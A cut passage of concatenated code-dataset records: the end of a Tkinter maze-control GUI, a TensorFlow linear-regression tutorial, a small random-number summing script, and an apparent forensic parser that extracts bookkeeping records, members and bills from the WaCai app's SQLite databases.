bg=\"alice blue\", font=(\"bold\", 10))\n self.fname_lbl.grid(row=0, column=0, padx=5, pady=2, sticky=\"nsew\")\n\n self.mazename = StringVar()\n self.fname_entry = Entry(self.name_f, textvariable=self.mazename)\n self.fname_entry.grid(row=0, column=1, padx=5, pady=2, sticky=\"we\")\n self.mazename.set(\"Enter maze name... [Decisi-o-nator_3000]\")\n\n self.sesname_lbl = Label(self.name_f, text=\"Session name\", bg=\"alice blue\", font=(\"bold\", 12))\n self.sesname_lbl.grid(row=1, column=0, padx=5, pady=2, sticky=\"nsew\")\n\n self.sess_savename = StringVar()\n self.fname_entry = Entry(self.name_f, textvariable=self.sess_savename)\n self.fname_entry.grid(row=1, column=1, padx=5, pady=2, sticky=\"we\")\n self.sess_savename.set(\"Enter session name...\")\n\n # MENU frame within big frame\n self.menu_f = Frame(self.bigf, bg=\"LightCyan2\", relief=\"groove\", borderwidth=2)\n self.menu_f.grid(row=1, column=0, sticky=\"w\")\n\n self.drawing_br_checkbtn_var = IntVar() # <-- work in progress: manually draw bridges\n self.drawing_br_checkbutton = Checkbutton(self.menu_f, text=\"Draw bridge\",\n variable=self.drawing_br_checkbtn_var,\n command=self.drawing_br_check, bg='LightCyan2')\n self.drawing_br_checkbutton.grid(row=0, column=1, padx=5, pady=5)\n\n self.drawingcheckbtn_var = IntVar()\n self.drawingcheckbutton = Checkbutton(self.menu_f, text=\"Not drawing\", variable=self.drawingcheckbtn_var,\n command=self.drawingcheck, bg='LightCyan2')\n self.drawingcheckbutton.invoke()\n self.drawingcheckbutton.grid(row=0, column=0, padx=5, pady=5)\n\n self.nextbrbtnt = Button(self.menu_f, text=\"Next BR\", bg='LightCyan3', command=self.nextbr_b, state=DISABLED)\n self.nextbrbtnt.grid(row=0, column=2, padx=5, pady=5)\n\n self.dispbtnt = Button(self.menu_f, text=\"Draw maze\", bg='LightCyan3', command=self.draw_maze)\n self.dispbtnt.grid(row=1, column=0, padx=5, pady=5)\n\n self.clearbtn = Button(self.menu_f, text=\"Clear maze\", bg='LightCyan3', command=self.clear_maze)\n self.clearbtn.grid(row=1, column=1, padx=5, pady=5)\n\n self.shelterbtn = Button(self.menu_f, text=\"Place shelter\", bg='LightCyan3', command=self.toggle_shelter, relief=\"raised\")\n self.shelterbtn.grid(row=1, column=2, padx=5, pady=5)\n\n # LOAD FRAME\n self.load_f = Frame(self.bigf, bg=\"linen\", relief=\"groove\", borderwidth=2)\n self.load_f.grid(row=1, column=0, sticky=\"nse\")\n\n self.load_lbl = Label(self.load_f, text=\"Load/Save\", bg=\"linen\", font=(\"bold\", 10))\n self.load_lbl.pack(anchor=\"w\", padx=5, pady=5)\n\n self.loadbtn = Button(self.load_f, text=\"Load maze\", bg=\"LavenderBlush2\", command=self.load_b)\n self.loadbtn.pack(side=LEFT, anchor=\"w\", padx=5, pady=5)\n\n self.savebnt = Button(self.load_f, text=\"Save maze\", bg=\"LavenderBlush2\", command=self.save_b)\n self.savebnt.pack(side=LEFT, anchor=\"w\", padx=5, pady=5)\n\n # lists subframe\n self.lists_f = Frame(self.bigf, bg=\"alice blue\", relief=\"groove\", borderwidth=2)\n self.lists_f.grid(row=2, column=0, sticky=\"we\")\n\n self.assignment_lbl = Label(self.lists_f, bg=\"alice blue\", text=\"Assign components\", font=(\"bold\", 12))\n self.assignment_lbl.grid(column=0, row=0, sticky='wn', pady=(10,0), padx=5)\n\n self.readybtn = Button(self.lists_f, text=\"Ready\", relief=\"raised\", bg=\"DarkOliveGreen3\",\n command=self.design_ready)\n self.readybtn.grid(row=0, column=1, sticky='en', padx=5, pady=(10,0))\n\n # BRIDGES\n self.bridges_f = Frame(self.lists_f, bg=\"linen\", relief=\"ridge\", borderwidth=2)\n self.bridges_f.grid(column=0, row=1, sticky='wn', 
padx=25, pady=(10, 5))\n        self.bridges_f.grid_columnconfigure(0, weight=1)\n\n        self.bridgesbtn = Button(self.bridges_f, text=\"Assign bridges\", relief=\"raised\", bg=\"alice blue\",\n                                 command=self.toggle_bridges)\n        self.bridgesbtn.grid(row=0, column=0, sticky='wn', padx=5, pady=5)\n\n        self.bridgeslist = Listbox(self.bridges_f)\n        self.bridgeslist.insert(END, \"No unassigned bridges...\")\n        self.bridgeslist.grid(row=2, sticky='we', pady=5, padx=5)\n        # NOTE: the event strings in the bind() calls below were lost in extraction; a right-button\n        # double-click (Button-3 on Windows, Button-2 on macOS) is an assumed reconstruction\n        if platform.system() == 'Windows':\n            self.bridgeslist.bind('<Double-Button-3>', self.edit_list_entry)\n        else:\n            self.bridgeslist.bind('<Double-Button-2>', self.edit_list_entry)\n\n        # SERVOS\n        self.servos_f = Frame(self.lists_f, bg=\"linen\", relief=\"ridge\", borderwidth=2)\n        self.servos_f.grid(column=1, row=1, sticky='nw', padx=25, pady=(10, 5))\n\n        self.servosbtn = Button(self.servos_f, text=\"Assign servos\", relief=\"raised\", bg=\"alice blue\",\n                                command=self.toggle_servos)\n        self.servosbtn.grid(row=0, column=0, sticky='wn', padx=5, pady=5)\n\n        self.servoslist = Listbox(self.servos_f)\n        self.servoslist.insert(END, \"No unassigned servos...\")\n        self.servoslist.grid(row=2, sticky='we', pady=5, padx=5)\n        if platform.system() == 'Windows':\n            self.servoslist.bind('<Double-Button-3>', self.edit_list_entry)\n        else:\n            self.servoslist.bind('<Double-Button-2>', self.edit_list_entry)\n\n\n        \"\"\"\n        =================================================================================================\n        Control\n        \"\"\"\n        self.editor_f = Frame(self.bigf, bg=\"OliveDrab4\", relief=\"groove\", borderwidth=2)\n        self.editor_f.grid(row=3, column=0, sticky=\"we\")\n\n        self.assignment_lbl = Label(self.editor_f, text=\"Maze Control\", bg=\"OliveDrab4\", font=(\"bold\", 14))\n        self.assignment_lbl.grid(column=0, row=0, sticky='wn', pady=5, padx=5)\n\n        self.closebtn = Button(self.editor_f, text=\"Close all\", bg='burlywood2', command=self.close_all)\n        self.closebtn.grid(column=0, row=1, sticky='n', pady=5, padx=0)\n\n        self.executebtn = Button(self.editor_f, text=\"Execute cmnd\", bg='khaki2', command=self.exec_command)\n        self.executebtn.grid(column=1, row=1, sticky='wn', pady=5, padx=5)\n\n        self.sesscontrolbtn = Button(self.editor_f, text=\"Start session\", bg='burlywood2', command=self.sessioncontrol,\n                                     state=DISABLED)\n        self.sesscontrolbtn.grid(column=2, row=1, sticky='n', pady=5, padx=0)\n\n        self.manualcontrol__var = IntVar()\n        self.manualcontrolbtn = Checkbutton(self.editor_f, text=\"Manual control\", variable=self.manualcontrol__var,\n                                            bg='OliveDrab4')\n        self.manualcontrolbtn.grid(row=0, column=1, padx=5, pady=5)\n\n        # Available BRIDGES\n        self.available_bridges = Frame(self.editor_f, bg=\"DarkOliveGreen3\", relief=\"ridge\", borderwidth=2)\n        self.available_bridges.grid(column=0, row=2, columnspan=2, sticky='wn', padx=25, pady=(15, 10))\n        self.available_bridges.grid_columnconfigure(0, weight=1)\n\n        self.bridges_lbl = Label(self.available_bridges, text=\"Bridges to assign\", bg=\"DarkOliveGreen3\")\n        self.bridges_lbl.grid(column=0, row=1, sticky='wn')\n\n        self.avail_bridgeslist = Listbox(self.available_bridges)\n        self.avail_bridgeslist.insert(END, \"No unassigned bridges...\")\n        self.avail_bridgeslist.grid(row=2, sticky='we', pady=5, padx=5)\n        self.avail_bridgeslist.bind('<Double-Button-1>', self.assign_br)  # assumed event string, lost in extraction\n\n        # Assigned BRIDGES\n        self.assigned_bridges_f = Frame(self.editor_f, bg=\"DarkOliveGreen3\", relief=\"ridge\", borderwidth=2)\n        self.assigned_bridges_f.grid(column=2, row=2, columnspan=2, sticky='nw', padx=25, pady=(15, 10))\n\n        self.servos_lbl = Label(self.assigned_bridges_f, text=\"Assigned bridges\", bg='DarkOliveGreen3')\n        
self.servos_lbl.grid(column=0, row=1, sticky='wn')\n\n        self.assigned_bridgeslist = Listbox(self.assigned_bridges_f)\n        self.assigned_bridgeslist.insert(END, \"No assigned bridges...\")\n        self.assigned_bridgeslist.grid(row=2, sticky='we', pady=5, padx=5)\n        self.assigned_bridgeslist.bind('<Double-Button-1>', self.remove_assigned_br)  # assumed event string, lost in extraction\n\n        # SERIAL\n        self.ser_f = Frame(self.bigf, bg='MistyRose3', relief=\"groove\", borderwidth=2)\n        self.ser_f.grid(row=4, column=0, sticky=\"we\")\n\n        self.getcomsbtn = Button(self.ser_f, text=\"Get COMs\", command=self.getcoms, bg='LightYellow2')\n        self.getcomsbtn.grid(column=0, row=1, sticky='wn', pady=5, padx=5)\n\n        self.startserbtb = Button(self.ser_f, text=\"Start serial\", command=self.checkser, bg='LightYellow2')\n        self.startserbtb.grid(column=0, row=2, sticky='wn', pady=5, padx=5)\n\n        self.ser_status_lbl = Label(self.ser_f, text=\"Serial unavailable\", bg='MistyRose3')\n        self.ser_status_lbl.grid(column=1, row=1, sticky='wn', pady=6, padx=5)\n\n        self.comname = StringVar()\n        self.comname_e = Entry(self.ser_f, textvariable=self.comname)\n        self.comname_e.grid(row=2, column=1, columnspan=1, padx=5, pady=5, sticky=\"we\")\n        self.comname.set(\"COM number\")\n\n        \"\"\"\n        =================================================================================================\n        Functionality\n        =================================================================================================\n        \"\"\"\n\n        # MOUSE CLICK events\n        # If we are drawing the maze, get click coords and draw a circle\n        self.c.bind(\"<Button-1>\", self.canvas_editing_interactions)\n        # Right click deletes the selected element (Button-3 on Windows, Button-2 on macOS;\n        # the original event strings were lost in extraction and are reconstructed here)\n        if platform.system() == 'Windows':\n            self.c.bind(\"<Button-3>\", self.del_obj)\n        else:\n            self.c.bind(\"<Button-2>\", self.del_obj)\n\n\n\nif __name__ == '__main__':\n    root = GUI()\n    # Start loop\n    tk.mainloop()\n","sub_path":"xl320_control/xl_320_control_python/dec_maze_gui.py","file_name":"dec_maze_gui.py","file_ext":"py","file_size_in_byte":46226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
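The platform checks around the canvas bindings above exist because Tk numbers mouse buttons differently: the right button is Button-3 on Windows and X11 but Button-2 under classic macOS Aqua. A minimal self-contained sketch of the same pattern (left click draws, right click deletes):

    import platform
    import tkinter as tk

    root = tk.Tk()
    canvas = tk.Canvas(root, width=200, height=200, background='white')
    canvas.pack()

    def draw(event):
        canvas.create_oval(event.x - 10, event.y - 10, event.x + 10, event.y + 10, fill='green')

    def delete_nearest(event):
        # Delete whatever canvas item is nearest the click, if any
        items = canvas.find_closest(event.x, event.y)
        if items:
            canvas.delete(items[0])

    right_button = '<Button-3>' if platform.system() == 'Windows' else '<Button-2>'
    canvas.bind('<Button-1>', draw)
    canvas.bind(right_button, delete_nearest)

    root.mainloop()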
+{"seq_id":"600165936","text":"import math\n\nfrom IPython import display\nfrom matplotlib import cm\nfrom matplotlib import gridspec\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom sklearn import metrics\nimport tensorflow as tf\nfrom tensorflow.python.data import Dataset\n\nfrom utils import *\n\ntf.logging.set_verbosity(tf.logging.ERROR)\npd.options.display.max_rows = 10\npd.options.display.float_format = '{:.1f}'.format\n\ndef train_model(data, learning_rate, steps, batch_size, features=\"total_rooms\", targets=\"median_house_value\"):\n periods = 10\n steps_per_period = steps / periods\n \n # Set up to plot the state of our model's line each period.\n plt.figure(figsize=(15, 6))\n plt.subplot(1, 2, 1)\n plt.title(\"Learned Line by Period\")\n plt.ylabel(targets)\n plt.xlabel(features)\n sample = data.sample(n=300)\n plt.scatter(sample[features], sample[targets])\n colors = [cm.coolwarm(x) for x in np.linspace(-1, 1, periods)]\n \n ###############################################################################\n # retrieve data\n X, Y = load_data(data, features=features, targets=targets)\n\n # Create feature columns.\n feature_columns = [tf.feature_column.numeric_column(key=features)]\n \n # Create input functions.\n training_input_fn = lambda: my_input_fn(X, Y, batch_size=batch_size)\n prediction_input_fn = lambda: my_input_fn(X, Y, num_epochs=1, shuffle=False)\n \n ## Build model\n # Create a linear regressor object.\n my_optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)\n my_optimizer = tf.contrib.estimator.clip_gradients_by_norm(my_optimizer, 5.0)\n linear_regressor = tf.estimator.LinearRegressor(\n feature_columns=feature_columns,\n optimizer=my_optimizer\n )\n\n ###############################################################################\n ## Train the model, but do so inside a loop so that we can periodically assess\n # loss metrics.\n print(\"Training model...\")\n print(\"RMSE (on training data):\")\n root_mean_squared_errors = []\n \n for period in range (0, periods):\n # Train the model, starting from the prior state.\n linear_regressor.train(\n input_fn=training_input_fn,\n steps=steps_per_period\n )\n\n # Take a break and compute predictions.\n predictions = linear_regressor.predict(input_fn=prediction_input_fn)\n predictions = np.array([item['predictions'][0] for item in predictions])\n \n # Compute loss.\n root_mean_squared_error = math.sqrt(\n metrics.mean_squared_error(predictions, Y))\n \n # Occasionally print the current loss.\n print(\"period {:2d} : {:.2f}\".format(period, root_mean_squared_error))\n \n \n # Add the loss metrics from this period to our list.\n root_mean_squared_errors.append(root_mean_squared_error)\n\n # Finally, track the weights and biases over time.\n # Apply some math to ensure that the data and line are plotted neatly.\n y_extents = np.array([0, sample[targets].max()])\n\n weight = linear_regressor.get_variable_value('linear/linear_model/{}/weights'.format(features))[0]\n bias = linear_regressor.get_variable_value('linear/linear_model/bias_weights')\n\n x_extents = (y_extents - bias) / weight\n # np.minimum(X, Y), np.maxmun(X, Y): 會逐位比較(broadcasting)\n x_extents = np.maximum(np.minimum(x_extents, sample[features].max()), sample[features].min())\n \n y_extents = weight * x_extents + bias\n plt.plot(x_extents, y_extents, color=colors[period]) \n \n print(\"Model training finished.\")\n\n # Output a graph of loss metrics over periods.\n plt.subplot(1, 2, 2)\n plt.ylabel('RMSE')\n 
plt.xlabel('Periods')\n plt.title(\"Root Mean Squared Error vs. Periods\")\n plt.tight_layout()\n plt.plot(root_mean_squared_errors)\n\n # Output a table with calibration data.\n calibration_data = pd.DataFrame()\n calibration_data[\"predictions\"] = pd.Series(predictions)\n calibration_data[\"targets\"] = pd.Series(Y)\n #display.display(calibration_data.describe())\n print(calibration_data.describe())\n\n print(\"Final RMSE (on training data): {:.2f}\".format(root_mean_squared_error))\n \n\nif __name__ == '__main__':\n # Read CSV file\n california_housing_df = pd.read_csv(\"../data/california_housing_train.csv\", sep=\",\")\n \n # randomize the data and scale median_house_value to be in units of thousands\n california_housing_df = df_processing(california_housing_df)\n\n # Train model\n features=\"total_rooms\"\n targets=\"median_house_value\"\n \n train_model(\n data=california_housing_df,\n learning_rate=0.001,\n steps=10,\n batch_size=1,\n features=features,\n targets=targets\n )\n\n plt.show()\n\n ","sub_path":"First Steps with TF/fisrt_steps_with_tensorflow_2.py","file_name":"fisrt_steps_with_tensorflow_2.py","file_ext":"py","file_size_in_byte":4855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
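train_model calls my_input_fn and load_data from utils, which is not shown in this record. One plausible definition of my_input_fn consistent with the call sites, in the same TF 1.x Estimator style; it assumes load_data returns a pandas Series per argument, and the real utils module may differ:

    import numpy as np
    from tensorflow.python.data import Dataset

    def my_input_fn(features, targets, batch_size=1, shuffle=True, num_epochs=None):
        # Key the feature by its Series name so it matches numeric_column(key=features)
        feature_dict = {features.name: np.array(features)}

        ds = Dataset.from_tensor_slices((feature_dict, np.array(targets)))
        ds = ds.batch(batch_size).repeat(num_epochs)
        if shuffle:
            ds = ds.shuffle(buffer_size=10000)

        # One-shot iterator yields (features, labels) tensors for the Estimator
        next_features, next_labels = ds.make_one_shot_iterator().get_next()
        return next_features, next_labels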
+{"seq_id":"578628673","text":"import random\r\nimport pprint\r\nn=0\r\neven = []\r\nodd = []\r\nwhile n < 100:\r\n f = random.randint(1,100)\r\n if f % 2 == 0:\r\n even.append(f)\r\n else:\r\n odd.append(f)\r\n n += 1\r\nsum_even = [sum(even)]\r\nsum_odd = [sum(odd)]\r\nprint(sum_odd) #проверка логики\r\ntotal = {}\r\nt = 1\r\nfor variable in even, odd, sum_even, sum_odd:\r\n total[t]=variable\r\n t+=1\r\npprint.pprint(total, width=1)\r\n","sub_path":"Dic.py","file_name":"Dic.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"181971921","text":"#coding:utf-8\n\n__author__ = \"Xu Tao\"\n\nimport clr\ntry:\n clr.AddReference(\"model_wacai\")\n clr.AddReference(\"MapUtil\")\nexcept:\n pass\n\nfrom PA_runtime import *\n\nimport json\nimport model_wacai\nfrom MapUtil import md5\n\nVERSION_APP_VALUE = 2\n\n\nclass WaCaiTally(object):\n\n def __init__(self, node, extract_deleted, extract_source):\n self.root = node.Parent.Parent.Parent\n self.extract_deleted = extract_deleted\n self.extract_source = extract_source\n self.wacai = model_wacai.WACAI()\n self.cache = ds.OpenCachePath(\"挖财记账\")\n\n def parse(self):\n if self.root is None:\n return\n db_path = md5(self.cache, self.root.AbsolutePath)\n if self.wacai.need_parse(db_path, VERSION_APP_VALUE):\n self.wacai.db_create(db_path)\n group_node = self.root.GetByPath(\"/Documents/GroupTallySDK\")\n self.get_group_tally(group_node)\n family_node = self.root.GetByPath(\"/Documents/FamilyTallySDK\")\n self.get_family_data(family_node)\n\n if not canceller.IsCancellationRequested:\n self.wacai.db_insert_table_version(model_wacai.VERSION_KEY_DB, model_wacai.VERSION_VALUE_DB)\n self.wacai.db_insert_table_version(model_wacai.VERSION_KEY_APP, VERSION_APP_VALUE)\n \n if self.wacai.db is not None:\n self.wacai.db_commit()\n self.wacai.db_close()\n \n models = model_wacai.ExportModel(db_path).get_model()\n return models\n\n def get_group_tally(self, node):\n if node is None:\n return\n self.get_grounp_tally_books(node)\n self.get_group_member(node)\n self.get_group_bill(node)\n\n def get_family_data(self, node):\n self.get_family_tally(node)\n self.get_family_member(node)\n self.get_family_bill(node)\n self.get_family_monthly_bill(node)\n\n def get_grounp_tally_books(self, node):\n db_node = node.GetByPath(\"grouptally.db\")\n if db_node is None:\n return \n db = SQLiteParser.Database.FromNode(db_node)\n if \"TBL_GROUP\" not in db.Tables:\n return\n tbs = SQLiteParser.TableSignature(\"TBL_GROUP\")\n for rec in db.ReadTableRecords(tbs, self.extract_deleted, True):\n try:\n if canceller.IsCancellationRequested:\n return\n tid = self._get_table_record_value(rec, \"id\") # int\n tname = self._get_table_record_value(rec, \"name\")\n ttype = self._get_table_record_value(rec, \"type\")\n data = self._get_table_record_value(rec, \"data\")\n\n tally_book = model_wacai.Tally()\n tally_book.source = db_node.AbsolutePath\n if rec.Deleted == DeletedState.Deleted:\n tally_book.deleted = 1\n tally_book.bookId = str(tid)\n tally_book.name = tname\n tally_book.tallyType = 2\n if data:\n try:\n tally_data = json.loads(data)\n if \"currencyFlag\" in tally_data:\n tally_book.moneyFlag = tally_data[\"currencyFlag\"]\n if \"memberCount\" in tally_data:\n tally_book.memberCount = tally_data[\"memberCount\"]\n if \"createdTime\" in tally_data:\n tally_book.createTime = tally_data[\"createdTime\"]\n if \"updatedTime\" in tally_data:\n tally_book.updatedTime = tally_data[\"updatedTime\"]\n except:\n pass\n if tally_book.bookId:\n self.wacai.db_insert_table_tally(tally_book)\n except Exception as e:\n TraceService.Trace(TraceLevel.Error,\"{0}\".format(e))\n self.wacai.db_commit()\n \n def get_group_member(self, node):\n db_node = node.GetByPath(\"grouptally.db\")\n if db_node is None:\n return\n db = SQLiteParser.Database.FromNode(db_node)\n if \"TBL_GROUP_MEMBER\" not in db.Tables:\n return\n tbs = SQLiteParser.TableSignature(\"TBL_GROUP_MEMBER\")\n for rec in db.ReadTableRecords(tbs, self.extract_deleted, True):\n try:\n if canceller.IsCancellationRequested:\n return\n bookid = 
self._get_table_record_value(rec, \"bookid\")\n                mid = self._get_table_record_value(rec, \"mid\")\n                name = self._get_table_record_value(rec, \"name\")\n                avatar = self._get_table_record_value(rec, \"avatar\")\n\n                member = model_wacai.Member()\n                member.source = db_node.AbsolutePath\n                if rec.Deleted == DeletedState.Deleted:\n                    member.deleted = 1\n                member.bookId = str(bookid)\n                member.memberId = str(mid)\n                member.avatar = avatar\n                member.name = name\n                if member.bookId and member.memberId:\n                    self.wacai.db_insert_table_member(member)\n            except Exception as e:\n                TraceService.Trace(TraceLevel.Error,\"{0}\".format(e))\n        self.wacai.db_commit()\n\n    def get_group_bill(self, node):\n        db_node = node.GetByPath(\"grouptally.db\")\n        if db_node is None:\n            return\n        db = SQLiteParser.Database.FromNode(db_node)\n        if \"TBL_GROUP_BILL\" not in db.Tables:\n            return\n        tbs = SQLiteParser.TableSignature(\"TBL_GROUP_BILL\")\n        for rec in db.ReadTableRecords(tbs, self.extract_deleted, True):\n            try:\n                if canceller.IsCancellationRequested:\n                    return\n                bill_record = model_wacai.BillRecord()\n                bill_record.source = db_node.AbsolutePath\n                if rec.Deleted == DeletedState.Deleted:\n                    bill_record.deleted = 1\n                tid = self._get_table_record_value(rec, \"bookid\")  # int\n                bill_record.bookId = str(tid)\n                ttype = self._get_table_record_value(rec, \"type\")\n                create_time = self._get_table_record_value(rec, \"billtime\")\n                bill_record.createTime = create_time\n                rec_data = self._get_table_record_value(rec, \"data\")\n                if rec_data:\n                    try:\n                        bill_data = json.loads(rec_data)\n                        if \"data\" in bill_data:\n                            data = bill_data[\"data\"]\n                            if \"subcategoryName\" in data:\n                                name = data[\"subcategoryName\"]\n                                bill_record.name = name\n                            if \"amount\" in data:\n                                amount = data[\"amount\"]\n                                if amount:\n                                    bill_record.amount = float(amount) / 100\n                            if \"type\" in data:\n                                bill_type = data[\"type\"]  # either COST or PRE\n                                if bill_type == \"COST\":\n                                    bill_record.bookType = 1\n                                elif bill_type == \"PRE\":\n                                    bill_record.bookType = 2\n                            if \"tip\" in data:\n                                tip = data[\"tip\"]\n                                bill_record.tip = tip\n                            if \"remark\" in data:\n                                remark = data[\"remark\"]\n                                bill_record.remark = remark\n                    except Exception as e:\n                        TraceService.Trace(TraceLevel.Info,\"{0}\".format(e))\n                if bill_record.bookId:\n                    self.wacai.db_insert_table_record(bill_record)\n            except Exception as e:\n                TraceService.Trace(TraceLevel.Error,\"{0}\".format(e))\n        self.wacai.db_commit()\n\n    '''\n    This table has no id to match on; matching by name risks mixing up records, so this is disabled for now\n    def get_group_monthly_bill(self, node):\n        db_node = node.GetByPath(\"grouptally.db\")\n        if db_node is None:\n            return\n        db = SQLiteParser.Database.FromNode(db_node)\n        if \"TBL_GROUP_SPENT\" in db.Tables:\n            return\n        tbs = SQLiteParser.TableSignature(\"TBL_GROUP_SPENT\")\n        for rec in db.ReadTableRecords(tbs, self.extract_deleted, True):\n            try:\n                if canceller.IsCancellationRequested:\n                    return\n                month = self._get_table_record_value(rec, \"month\")\n\n            except Exception as e:\n                TraceService.Trace(TraceLevel.Error,\"{0}\".format(e))\n    '''\n    def get_family_tally(self, node):\n        fa_node = node.GetByPath(\"MultiPeopleTally.db\")\n        if fa_node is None:\n            return\n        db = SQLiteParser.Database.FromNode(fa_node)\n        if \"TBL_BOOK\" not in db.Tables:\n            return\n        tbs = SQLiteParser.TableSignature(\"TBL_BOOK\")\n        for rec in db.ReadTableRecords(tbs, self.extract_deleted, True):\n            try:\n                if canceller.IsCancellationRequested:\n                    return\n                tally = model_wacai.Tally()\n                tally.source = fa_node.AbsolutePath\n                if rec.Deleted == DeletedState.Deleted:\n                    tally.deleted = 1\n                fid = self._get_table_record_value(rec, \"id\")\n                tally.bookId = 
str(fid)\n                tally.tallyType = 1\n                data = self._get_table_record_value(rec, \"data\")\n                if data:\n                    try:\n                        json_tally = json.loads(data)\n                        if \"createdTime\" in json_tally:\n                            create_time = json_tally[\"createdTime\"]\n                            tally.createTime = create_time\n                        if \"updatedTime\" in json_tally:\n                            update_time = json_tally[\"updatedTime\"]\n                            tally.updatedTime = update_time\n                        if \"name\" in json_tally:\n                            t_name = json_tally[\"name\"]\n                            tally.name = t_name\n                        if \"memberCount\" in json_tally:\n                            m_count = json_tally[\"memberCount\"]\n                            tally.memberCount = m_count\n                        if \"currencyFlag\" in json_tally:\n                            money_flag = json_tally[\"currencyFlag\"]\n                            tally.moneyFlag = money_flag\n                    except Exception as e:\n                        TraceService.Trace(TraceLevel.Info,\"{0}\".format(e))\n                        continue\n                if tally.bookId:\n                    self.wacai.db_insert_table_tally(tally)\n            except Exception as e:\n                TraceService.Trace(TraceLevel.Error,\"{0}\".format(e))\n        self.wacai.db_commit()\n\n    def get_family_member(self, node):\n        bill_node = node.GetByPath(\"MultiPeopleTallyRN.db\")\n        if bill_node is None:\n            return\n        db = SQLiteParser.Database.FromNode(bill_node)\n        if \"TBL_MEMBER\" not in db.Tables:\n            return\n        tbs = SQLiteParser.TableSignature(\"TBL_MEMBER\")\n        for rec in db.ReadTableRecords(tbs, self.extract_deleted, True):\n            try:\n                if canceller.IsCancellationRequested:\n                    return\n                member = model_wacai.Member()\n                member.source = bill_node.AbsolutePath\n                if rec.Deleted == DeletedState.Deleted:\n                    member.deleted = 1\n                bookid = self._get_table_record_value(rec, \"bookid\")\n                member.bookId = str(bookid)\n                mtype = self._get_table_record_value(rec, \"type\")  # member type: 1 = family shared, 0 = regular\n                member.memberType = mtype\n                isdelete = self._get_table_record_value(rec, \"isdelete\")  # 0 = not deleted, 1 = deleted\n                data = self._get_table_record_value(rec, \"data\")\n                if data:\n                    try:\n                        m_id = b_id = None\n                        json_member = json.loads(data)\n                        if \"id\" in json_member:\n                            m_id = json_member[\"id\"]\n                            member.memberId = m_id\n                        if \"bookId\" in json_member:\n                            b_id = json_member[\"bookId\"]\n                        if \"name\" in json_member:\n                            name = json_member[\"name\"]\n                            member.name = name\n                        if \"mobile\" in json_member:\n                            photo = json_member[\"mobile\"]\n                            member.phone = photo\n                        if \"avatar\" in json_member:\n                            avatar = json_member[\"avatar\"]\n                            member.avatar = avatar\n                        if \"createdTime\" in json_member:\n                            create_time = json_member[\"createdTime\"]\n                            member.createTime = create_time\n                        if \"updatedTime\" in json_member:\n                            update_time = json_member[\"updatedTime\"]\n                            member.updatedTime = update_time\n                    except Exception as e:\n                        TraceService.Trace(TraceLevel.Info,\"{0}\".format(e))\n                        continue\n                if member.bookId and member.memberId:\n                    self.wacai.db_insert_table_member(member)\n            except Exception as e:\n                TraceService.Trace(TraceLevel.Error,\"{0}\".format(e))\n        self.wacai.db_commit()\n\n    def get_family_bill(self, node):\n        bill_node = node.GetByPath(\"MultiPeopleTallyRN.db\")\n        if bill_node is None:\n            return\n        db = SQLiteParser.Database.FromNode(bill_node)\n        if \"TBL_BILL\" not in db.Tables:\n            return\n        tbs = SQLiteParser.TableSignature(\"TBL_BILL\")\n        for rec in db.ReadTableRecords(tbs, self.extract_deleted, True):\n            try:\n                if canceller.IsCancellationRequested:\n                    return\n                bill_record = model_wacai.BillRecord()\n                bill_record.source = bill_node.AbsolutePath\n                if rec.Deleted == DeletedState.Deleted:\n                    bill_record.deleted = 1\n                bookid = self._get_table_record_value(rec, \"bookid\")\n                bill_record.bookId = str(bookid)\n                mid = self._get_table_record_value(rec, \"mid\")  # member id\n                billtime = self._get_table_record_value(rec, \"billtime\")  # bill timestamp\n                bill_record.createTime = billtime\n                data = self._get_table_record_value(rec, \"data\")\n                if data:\n                    try:\n                        record = json.loads(data)\n                        if \"comment\" in record:\n                            comment = record[\"comment\"]\n                            bill_record.remark = comment\n                        if \"createTime\" in record:\n                            create_time = record[\"createTime\"]\n                            bill_record.createTime = create_time\n                        if \"updatedTime\" in record:\n                            update_time = record[\"updatedTime\"]\n                            bill_record.updatedTime = update_time\n                        if \"latitude\" in record and \"longitude\" in record:\n                            lng = record[\"longitude\"]\n                            lat = record[\"latitude\"]\n                            if lng and lat:\n                                bill_record.langitude = lng\n                                bill_record.latitude = lat\n                        if \"amount\" in record:\n                            amount = float(record[\"amount\"])\n                            bill_record.amount = amount\n                        if \"recType\" in record:\n                            rectype = record[\"recType\"]  # 1 = expense, 2 = income\n                            if rectype == 1:\n                                bill_record.bookType = 1\n                            elif rectype == 2:\n                                bill_record.bookType = 2\n                        if \"attachments\" in record:\n                            if record[\"attachments\"]:\n                                attach = record[\"attachments\"]\n                                try:\n                                    attach_data = json.loads(attach)\n                                    urls = []\n                                    for res in attach_data:\n                                        if \"addr\" in res:\n                                            urls.append(res[\"addr\"])\n                                    if len(urls) != 0:\n                                        bill_record.mediaPath = ','.join(str(u) for u in urls)\n                                except Exception:\n                                    pass\n                        if \"members\" in record:\n                            if record[\"members\"]:\n                                mids = []\n                                for item in record[\"members\"]:\n                                    try:\n                                        if \"memberId\" in item:\n                                            mids.append(item[\"memberId\"])\n                                    except Exception:\n                                        pass\n                                if len(mids) != 0:\n                                    bill_record.memberId = ','.join(str(u) for u in mids)\n                    except Exception as e:\n                        TraceService.Trace(TraceLevel.Info,\"{0}\".format(e))\n                        continue\n                if bill_record.bookId and bill_record.amount:\n                    self.wacai.db_insert_table_record(bill_record)\n            except Exception as e:\n                TraceService.Trace(TraceLevel.Error,\"{0}\".format(e))\n        self.wacai.db_commit()\n\n    def get_family_monthly_bill(self, node):\n        bill_node = node.GetByPath(\"MultiPeopleTallyRN.db\")\n        if bill_node is None:\n            return\n        db = SQLiteParser.Database.FromNode(bill_node)\n        if \"TBL_TOTAL\" not in db.Tables:\n            return\n        tbs = SQLiteParser.TableSignature(\"TBL_TOTAL\")\n        for rec in db.ReadTableRecords(tbs, self.extract_deleted, True):\n            try:\n                if canceller.IsCancellationRequested:\n                    return\n                monthbill = model_wacai.MonthBill()\n                monthbill.source = bill_node.AbsolutePath\n                if rec.Deleted == DeletedState.Deleted:\n                    monthbill.deleted = 1\n                bill_type = self._get_table_record_value(rec, \"type\")\n                monthbill.bookType = bill_type\n                book_id = self._get_table_record_value(rec, \"bookid\")\n                monthbill.bookId = book_id\n                book_time = 